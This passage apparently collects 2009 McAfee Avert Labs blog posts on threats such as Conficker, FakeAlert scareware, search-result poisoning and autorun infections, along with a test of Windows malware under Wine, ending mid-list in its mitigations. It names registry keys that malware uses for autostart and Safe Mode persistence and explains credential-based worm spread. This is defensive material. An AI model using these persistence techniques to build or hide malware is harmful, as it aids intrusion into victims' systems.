The next thing you probably want to know–and what’s probably most important to you when dealing with this–is how are you going to combat this threat? Riding to the rescue we see Avert Labs Services. They have published a practical “in the trenches” document to help you identify and combat the infection.

But beyond anti-malware protection, what else can you do?

The best way is to prevent initial, or further, infection. If you have the latest variant, you were most probably hit by the Conficker.worm.a or Conficker.worm.b variants. McAfee VirusScan or our standalone Stinger utility are useful tools. If you also have a vulnerability manager and host/network IPS you may have other avenues to explore. These tools could allow you to detect any missing MS08-067 patches, prevent code execution in the event of a buffer overflow, or detect traffic from the Conficker.worm.a and Conficker.worm.b over the wire. These steps could help you shut the door on the initial infection vector. In fact, the combined additional coverage when using McAfee (formerly Foundstone) Vulnerability Manager, McAfee Host Intrusion Prevention (formerly Host IPS), and McAfee Network Security Platform (formerly IntruShield) would give you four checks, and four signatures plus generic buffer overflow protection. That’s great additional firepower.

Another good resource? The page you are currently visiting. We’ll be sure to update you as things progress.

=== Update March 31, 2009, 7pm PDT ===

It’s already April 1 in many parts of the world. And, thankfully, so far it’s been quiet on the Conficker front. If you’re scrambling to check for Conficker infection on your systems, then check out our Conficker Detection Tool. Also, remember to keep your product signatures updated!

In the run-up to April 1, the media spotlight around the latest Conficker worm variant has reached a morbid frenzy. From being touted as an “April Fool’s joke” to outrageous headlines such as “Millions of computers expected to be destroyed”–no other worm in recent history has generated this much media attention. But what have we learned from history? From the days of Michelangelo to the recent Blaster, SoBig, Sober, and Kamasutra worms, the hype surrounding the activation or payload dates of major Internet worms have turned out to be only damp squibs.

What happens on April Fool’s Day is anyone’s guess. Although we still don’t know the real intent of the authors of the Conficker worm, they have consistently improved the worm by adding new functionality and anti-debugging tricks with every released variant. In order to resist the Conficker Cabal initiative, which recently blocked domain registrations associated with previous Conficker A and B variants, the worm authors upped the randomly generated domain count from 250 to 50,000. The intent behind generating and attempting to contact so many domains is to make it extremely difficult for security researchers to monitor sites that could potentially host a payload for the Conficker worm to download and execute.

What we do know is almost all the security vendors have thoroughly analyzed Conficker–also known as Downadup and Kido worm–and have good generic detection and cleaning in place. Uploading a couple of randomly selected Conficker binaries to the VirusTotal site consistently shows an overall anti-virus detection rate of 90 percent or above. And these high detection rates are across vendors–small or big.

To prepare for any trouble on April 1, McAfee now offers a special build of its standalone cleaning tool Stinger, which will be updated on a daily basis to include any undetected Conficker variants from the wild. This special build of Stinger can be downloaded from the Avert Tools site. We’ve also posted detailed documentation on mitigation steps that security staff within organizations can take to combat W32/Conficker. Additional McAfee product coverage information for MS08-067–the Microsoft Windows Server Service vulnerability, which is exploited by the worm–can be viewed at the McAfee Threat Center.

Please ensure that your copy of Microsoft Windows is patched and your security software is fully up to date. That way you won’t end up an April Fool.

You already know that malware changes registry keys to take advantage of the autorun capability when systems and applications start. The registry keys we often see for this purpose include:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Current Version\Windows\AppInit_DLLs
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[Legit_program]\Debugger
HKEY_CLASSES_ROOT\CLSID\[CLSID]\InprocServer32

Recently, we noticed that the Lando Trojan uses a different registry to load its malicious code into Internet Explorer. By dropping a fake sound driver (wdmaud.sys) into the %system32% folder and by adding the registry key HKEY_LOCAL_MACHINE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux2: “%system32%\wdmaud.sys,” the malware author injects malicious code into the iexplore.exe process. When the user launches Internet Explorer, the attacker hijacks Google search.

How can you distinguish the real sound driver from the fake? The legitimate wdmaud.sys is a component of Microsoft’s WDM driver or WINMM WDM Audio Compatibility driver. You’ll find it in the %system32%\drivers\ folder. It is about 84KB and includes complete version information.

Meanwhile the malicious wdmaud.sys is located in the %system32%\system32 folder. It is only about 22KB and has no version information.

By comparing their file properties, you can easily tell the difference. But, as always, be careful when deleting the malicious wdmaud.sys or other suspicious files. You don’t want to trash the legitimate driver.

Computer users know that they shouldn’t touch system files. If they did, they could damage their computers. A well-known ploy of malware authors is to name their files after system files. Users can be tricked into ignoring malicious files on their systems by this social-engineering method.

Let’s look at what the Backdoor-CEP.gen Trojan does, for example. When a user is infected with this Trojan, its drops the file server.exe into the user’s system directory:

Like many system files, server.exe is hidden. Now how many users would take a second look at server.exe in their system32 folders? Unfortunately, server.exe is a backdoor that waits for and responds to commands from remote attackers. As always, users should exercise caution when dealing with executables of unknown origin. For more about the Backdoor-CEP.gen family, check out its VIL page.

I ran across a new twist on the by-now well known FakeAlert series. Just in case you have been lucky enough not to have dealt with this malware, it goes roughly like this:

You get an email from what looks to be a legitimate source, or visit a legitimate looking website that is offering the latest must-have application or upgrade. “This thing looks cool”, you think as you happily ignore your IT security friend’s advice against following unsolicited or potentially unsafe links. “Someone must really like me to be sharing this with me”.

So you continue to download the ‘treasure’. Then when you try to install it, it pops up an error – something about being corrupt and the installation cannot proceed. Seconds later, you find that some ‘nice’ company has put an antivirus scanner on your computer and begins to scan it for you. You find out that you are loaded with all kinds of nasty stuff and because nothing in life is free, you have to pony up the money to have your computer cleaned.

Problem is, you may not have had these infections in real life. Except, of course, the one you downloaded and installed yourself. This is but one scenario of the fake antivirus scourge.

So the new twist is that your favorite audio or video application may now assist in this nefarious sale. When you install this application, you will actually see things ‘happening’. You won’t be happily working away listening to the latest pop sensation when this gets loaded. The malware will actually stop your multimedia application and drop your volume to zero. It will likewise prevent you from attempting to restart it. You will start to get more and more ominous warnings about your audio and video codecs being corrupted until your entire desktop background is replaced with a giant ‘Your system is melting down and the world is coming to an end – just click here and we will help you fix it’ message (author’s note: it’s not that dramatic, but you get the idea). Of course to ‘fix’ it, it will cost you.

That said, be careful of this scam. We all would like to whistle while we work, but this may have you singing a different tune (sorry, couldn’t resist the sappy line).

More technical information is available here:
FakeAlert-MCodec

McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

UPDATE MARCH 17th

Apologies for the busted links yesterday. All seem to be resolving fine now.

Last week I blogged about how the community forum of Democrats.org was being abused to help manipulate Google’s search results; to lead people to malware.  It appeared that by the end of last week, Democrats.org began the cleanup process of removing all the bogus posts, which seems to have been completed as of this time.  Google’s cache shows that other popular sites were hit as well, including my.barackobama.com and Microsoft’s silverlight.net, which were cleaned up sometime before the end of last week.

In looking a little more at the spammed phrases, it appears as though there are likely multiple groups behind these attacks, perhaps with different agendas.   Some of this is obvious from the formatting of the spam.  The terms themselves also vary, some appear in more dictionary style, while others are more focused on current events, and others still are rather uncommon.  The uncommon terms (including typos) lead me to speculate that at least some terms originated from compromised systems.  There may be a circular nature to this, where unsuspecting victims become infected with one piece of malware, only to have their search terms harvested, analyzed, and subsequently used to entice other victims, but again this is speculation at this point.

Windows offers the useful option of “Safe Mode” to recover from any damage caused by various malfunctions in the system. Booting in Safe Mode loads limited drivers and services that are required for the basic operation of the system, but avoids adding many extras that complicate the environment. In general, Safe Mode is very helpful in recovering the system from malware infections. However, malware can exploit this feature by loading in Safe Mode, thus creating great difficulties for users and administrators in recovering from these infections.

The services and drivers that load in Safe Mode are listed under the following registry key(s):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network

If malware gains control of the system, it can add its entry under the above key(s) to load during a Safe Mode boot. This type of malware is difficult to remove manually; you’ll need an anti-virus product to detect and clean such malware.

Always practice “safe surfing,” which is the first step in keeping your computers clean, and keep your anti-virus signatures updated.

One month ago, my colleague Marius Van Oers posted a blog to announce the number of drivers in our DATs passed 500,000. Today, at McAfee reached another record: We received our twenty-millionth malware sample.

In about 22 years, from 1986 to March 2008, 10 million samples piled up in our collection. In just the last 12 months, however, from March 2008 to March 2009, this figure doubled. This pace represents 27,000 samples in a day, or 1,100 each hour.

These figures demonstrate that real-time response is more vital than ever. But it is not sufficient. Faced with such quantity, researchers have to innovate to create sophisticated heuristic detections. And a third need is a multidisciplinary response: Research teams devoted to host intrusions, network intrusions, and ethical vulnerability disclosure also have to play an important part in this battle. As a global research team, McAfee Avert Labs is able to take up the challenge. I’ll just wish “good luck” to all my colleagues.

During the last couple of years we have seen malware authors increasingly incorporate the autorun.inf infection vector into malware families–with stunning success. In addition to traditional autorun worms that use this feature, pure-play backdoors, bots, password stealers, and even parasitic viruses that previously required a user to click on an executable file to infect the system have incorporated this technique. While the autorun functionality in operating systems does provide some convenience (it saves a couple of clicks), it has single-handedly revived the 1980s model of hand-carried malware propagation.

Two prolific parasitic virus families that have incorporated this infection vector are W32/Sality and W32/Virut. When a removable drive is inserted into an infected machine, the W32/Sality virus infects Microsoft Notepad or Minesweeper and copies it onto the removable drive. The infected notepad.exe or winmine.exe file is renamed with a random .pif or .scr extension and is accompanied with an obfuscated autorun.inf. Below you’ll see a code snippet and the accompanying autorun.inf file.

Even if the removable drive is cleaned of the virus infection, the random namely Microsoft executable would still exist on the drive. Although benign, the leftover remnants would cause some degree of confusion about the origin of the file. Especially since it’s a renamed Microsoft file with a .pif or .scr extension!

The W32/Virut virus is also known to copy infected notepad.exe files to removable drives. Both these virus families are a royal pain in the posterior to clean. This technique provides a resourceful way for them to reinfect hosts even after cleanup.

The other day I blogged about Google Trends being abused to serve malware.  The attackers were not only targeting the most popular search terms, but also manipulating Google’s page rankings to appear high up on search results.  It appears that Google may have squashed those attacks, at least at the moment.

The pages that were coming up while searching Google seem to be purged from Google’s index.  The pages may still be found on other search engines, though not ranked as high.  This is also visible in stats I started gathering yesterday.

I took the top 100 search terms for each day of this week and ran a Google search on each term.  I then considered the top 10 search results for each term, looking for poisoned links with high rankings.  Admittedly it would have been better to gather the search results on each day, rather then running the test several days after the fact, but none the less the limited results do suggest that Google took some recent actions.

The following graph shows significant activity prior to mid-day yesterday.

We can assume the attackers will be looking at new and creative ways to circumvent any countermeasures that may be in place.

Search safe.

The other day a worm, often referred to as “Error Check System” was spreading on Facebook.  In fact if you searched for information on this threat, your search results were poisoned to lead unsuspecting victims to a site that attempts to install a rogue anti-spyware Trojan.  Some folks blogged that this search connection was “too much of a coincidence“, and that the Facebook part of the threat was a “red herring“.  I do not believe this is the case, and here’s why.

Last week I was following up on a comment made to the McAfee Avert Labs blog.  The URL provided by the visitor (**********.******.bee.pl/waledac_botnet.html) redirected to another site that attempted to install the same trojan.  Running a search on part of that URL yielded hundreds of search results, many that were placed high up on Google’s results.  The summary text was relevant for the search term and it’s clear that those behind the redirects are manipulating the internet (Google); by not only getting their newly created sites to appear high on the search results page, but also to display relevant text in the page summary section, and for the hottest terms.  Here’s one example, ironically related to the recent Gmail outage.

You’ll also notice that the page summary is identical to the top search result, taken from Google News.  Looking at more search results it is clear that the attackers are targeting popular search terms.

 Other searches show the results using all lowercase titles, the same as used by Google Trends.  In fact, checking some of the top Google Trends links we can see that the abusers are hitting it (ash wednesday 2009 was the #1 search term at the time of this writing, this is image was edited to fit on the blog).

The notion of malware distributors abusing Google Trends is not new, and received some attention in October of last year.  However, I do not recall previous attacks being as aggressive as the current ones, being distributed across numerous sites, targeting many many high-profile search terms, and having the poisoned links regularly appearing high up in the result pages.

Once a user visits one of these poisoned links, the destination page references a script file (style.js), which is obfuscated.

Decoding the script shows that it redirects the user based on the referring URL being “google”,”msn”,”yahoo”,” comcast”,”aol.com”.  This is just one of the many ways the bad guys focus their attacks on potential victims, while making it a tiny bit more difficult for others to discover it.  Once you’re redirected, it’s situation normal for the attackers, various fake alert and scanning messages and windows appearing, ultimately leading to the installation of a FakeAlert trojan (such as one of the 9,500+ known binaries identified by McAfee as FakeAlert-AB).

If you made it down to the bottom of this blog, I probably don’t need to remind you to look carefully before you click, on the Web.

– Update Feb 24, 10:15 PDT –
Microsoft has released a security advisory for this issue (CVE-2009-0238):
http://www.microsoft.com/technet/security/advisory/968272.mspx

Many versions of Excel are vulnerable, including 2000, 2002, 2003, 2007, 2004/2008 for Mac, Excel Viewer/Excel Viewer 2003.
 –

A Trojan exploiting an unpatched Microsoft Excel vulnerability has been reported from the field. McAfee Avert Labs has confirmed that Microsoft Excel 2007 and 2003 are affected. Other versions may also be impacted.

McAfee DAT files identify known malicious Excel spreadsheet files as Exploit-MSExcel.r Trojan, and dropped files as BackDoor-DUE Trojan in the 5534 DATs.

As with the initial Exploit-PDF.i threat, current attacks are very targeted and limited. When succesfull, it installs a backdoor that attempts to connect a remote site port 80 and waits for commands.

The mitigation for this infection is to block unknown TCP connections. However, one of the best protection methods is to remain vigilant against Excel files from untrusted sources or sent at an unexpected time until a security update is available.

The year 2009 has so far have a been hectic one for anti-virus vendors and IT administrators alike, “thanks” to two prolific malware families: W32/Conficker and W32/Virut. Malware researchers and field engineers have literally burned the midnight oil to ensure networks are protected against these threats.

Some of the organizations that were hit with these infections had the latest Microsoft updates installed but still got infected. During the post-mortem of the outbreaks, one glaring mistake stood out.

Administrators routinely attend to distress calls from users whenever they have an issue with their machines. By habit, the admins tend to log onto the affected workstation using their own accounts—which have domain-administrator privileges. For a moment, let us assume the suspicious user’s workstation was infected with W32/Conficker. What could possibly go wrong from here?

When the W32/Conficker worm infects a machine, it scans the local network and attempts to infect machines using the credentials of the currently logged-on user. If the initial login attempt fails, then the worm attempts a brute-force attack to authenticate, using a hardcoded list of passwords. Because most organizations have enforced complex password policies these days, brute-forcing is ineffective. But the moment the administrator logs onto the affected machine using his or her domain account, W32/Conficker runs using the elevated credentials of a domain administrator. Straight away the worm can infect any host on the domain using these newly acquired administrator credentials. Shown below is a traffic-capture screenshot of this behavior.

Upon copying the worm’s DLL to the System32 folder, W32/Conficker proceeds to create a scheduled job task to execute the worm at a predefined time. In a matter of minutes the entire network, with thousands of machines, gets infected.

It’s pretty much the same story with W32/Virut, a polymorphic entry-point-obscuring virus that spreads by infecting executable and script files. A machine infected with W32/Virut would scan and infect shared drives on the network using the credentials of the currently logged-on user. Because most domain users have limited write access to shared resources on the network, the infection is confined to a subset of machines. But the moment the administrator commits the cardinal sin of logging onto an infected machine, W32/Virut runs with elevated credentials and has write access to every C$ and Admin$ share on the network.

To prevent such an outbreak from happening, it is imperative that administrators refrain from logging onto a suspect machine using their own accounts. Logging on using the workstation’s local administrator account can also have the same effect; most corporate workstations are ghosted from the same image and could have the same local admin account and password.

An alternative is to use remote desktop solutions such as VNC, GoToAssist, or TeamViewer. These three are not tied to domain authentication. Once a suspect machine is identified, it should be isolated from the network for further investigation. Better safe than sorry

For the unaware, Wine is an application that enables users to run Windows applications on Unix-like computers. Like many users, I use Wine on my Linux machine to run a couple of Windows applications I cannot do without. I could run these applications on a virtual machine, or even dual-boot with Windows and Linux, but running them in Wine is just easier.

Although running Windows applications in Wine has its advantages, it also comes at a price: bringing Windows malware into Linux. I’m aware that it isn’t Wine’s responsibility to distinguish between a malicious and a nonmalicious file, and that Wine shouldn’t have any problem running a malicious file; however, I had this morbid curiosity to see how well today’s malware would fare running on Wine, and so began an experiment using the following setup:

• Ubuntu Linux 8.04 [comes with Gnome desktop environment]
• Wine 1.0 [run as a nonroot user with default settings]

I decided to choose samples that displayed a cocktail of malicious behavior, and so I chose the following:

File Infectors

W32/Philis is a file infector that apart from appending its code to other executables downloads and drops other malware.

This malware ran without throwing any errors in Wine. It immediately dropped files in the “Windows” and “Windows\System32″ folders and executed these dropped files. It then attempted to connect to a preconfigured site, and downloaded more malware successfully. It also began infecting executables in the Wine directory and created a registry run key for the malicious file.

The screenshot below shows the clean “CProcess.ori,” the original file 35KB in size, and “CProcess.vir,” the infected file 131KB in size.

It’s worth mentioning that the autostart registry key the file infector created will not work under Wine, so applications will not be able to autostart when the Linux machine is booted up. Also, this file infector didn’t seem to infect ELF files. But I’m guessing that a file infector that blindly appends/prepends its code to other files shouldn’t have any problem corrupting ELF files.

Autorun Malware

W32/Autorun.Worm.CP is an autorun worm, which drops autorun.inf in the root of removable drives.

This malware also ran without any errors. It dropped both the malicious files and the associated autorun.inf file in the C:\ drive and attached removable devices, and created a registry run key.

The screenshot below shows the created Autorun.inf file, along with the malicious files that were created in the root of the removable device.

The registry run key created by the malware won’t work in Wine, however. As long as the malicious file is running, any new removable devices connected to the machine will get infected, thus making a Linux machine the origin of an infection.

Although it is difficult for malware to autostart in Wine, it is not impossible. Malware can be written to find out if it is running in Wine. It can then either download a Linux binary onto the machine and/or simply add an autostart entry for itself in the Linux desktop environment’s common autostart locations, using the nonroot user’s credentials.

IRC Trojans

IRC/Contact malware drops files and connects to a preconfigured IRC server. This IRC Trojan, when ran in Wine, connected to the preconfigured IRC server. From the IRC server I was able to connect to the bot, and control it. Though the control was limited, I was still able to list the files under the Wine directory, get system information, download files to the Linux machine remotely, etc.

The screen shot below shows my logging into the infected Linux machine and issuing commands:

Click here for larger version of the image.

The screen shot below shows the infected machine responding to the “getinfo” command issued from the IRC channel:

Click here for a larger version of the image.

This IRC Trojan was very simple in features, but I’m guessing that with a complex one, an attacker shouldn’t have any problem scanning the subnet for an exploit and sending a payload to infect Windows machines.

Keyloggers/Password Stealers

Apart from this, I tried running a couple of password stealers and keyloggers, but I couldn’t find one that worked well. I’m guessing they couldn’t get a hook to the keyboard.

Although stealing information using a Windows malware in Wine is difficult, an infected Linux machine can still contribute to a DOS attack or be the origin of an infection as suggested earlier.

Scareware

This class of malware displays falsely exaggerated scan reports and tricks users into buying them. They utilize extreme social-engineering tactics combined with obfuscated Java scripts that check for exploits on the machine.

Although I didn’t run the Scareware installer in Wine, I did browse through a site that ran a JavaScript to pop up a window informing me that my “Windows” machine was infected, and requested that I install the malicious file.

Screen shots below:

Click here for a larger screen shot.

It is important to note that if the user had set the file association for Windows executables with Wine, then simply double-clicking the downloaded file would run the malware.

Mitigation Techniques

• Never run Wine applications as root.
• Wine maps the root directory, the user’s home directory, CD ROMs and removable devices found, and these mappings are listed in “~/.wine/dosdevices/”. Consider deleting these except the link to your drive_c.
• Do not set the file association for Windows executables with Wine. This would enable the running of Windows executables in Wine by simply double-clicking them.
• Administrators should think t